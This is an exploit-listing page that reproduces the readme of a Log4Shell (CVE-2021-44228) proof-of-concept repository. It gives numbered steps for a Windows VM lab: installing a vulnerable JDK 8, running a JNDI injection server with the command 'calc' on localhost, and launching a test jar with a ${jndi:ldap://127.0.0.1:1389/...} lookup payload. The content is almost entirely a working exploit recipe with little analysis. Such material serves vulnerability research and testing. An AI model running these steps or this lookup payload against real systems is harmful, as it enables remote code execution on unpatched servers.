Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228

Name: Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228
Rating: 5 (167 reviews)

2021-12-13 | CVSS 9.3

## https://sploitus.com/exploit?id=3E142E8E-743B-5786-9EB8-0FED1933F71D
## CVE-2021-44228_Log4Shell
Test source code for Log4Shell(CVE-2021-44228).  


### Step Information  

1. Install JDK8 (< 8u191) in virtual machine(Windows 10).  

2. Copy `out\artifacts\POC_jar\POC.jar` in Windows.

3. Copy `JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar` in Windows, <a href="https://github.com/welk1n/JNDI-Injection-Exploit">Get JNDI-Injection-Exploit</a>  

4. Run `java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "127.0.0.1"`  

5. Run `java -jar POC.jar ${jndi:ldap://127.0.0.1:1389/*****}`  

　　![](https://cdn.jsdelivr.net/gh/yanghaoi/CVE-2021-44228_Log4Shell/out/POC.gif)